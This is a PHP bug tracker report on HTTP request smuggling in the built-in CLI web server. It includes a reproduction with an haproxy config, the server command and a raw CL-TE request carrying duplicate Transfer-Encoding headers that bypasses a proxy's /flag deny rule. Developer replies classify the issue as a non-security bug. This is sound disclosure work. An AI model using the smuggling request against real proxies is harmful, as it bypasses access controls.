php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2021-11-15 15:42 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: kn0wns1c at gmail dot com
New email:
PHP Version: OS:

 

 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
Description:
------------
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a legal request. a attacker may use this feature make a HTTP Request Smuggling attack.

for example, using haproxy to make CL-TE attack:

haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
run php webserver

```
php -S 127.0.0.1:8080
```

use this http request can bypass haproxy /flag restrict

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-09-01 07:12 UTC] stas@php.net
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC] stas@php.net
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
 [2021-11-15 15:42 UTC] cmb@php.net
> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not implemented), since it doesn't
support this tranfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally know values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider to change
this to doc problem.

[1] <https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.1>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon Dec 02 20:01:32 2024 UTC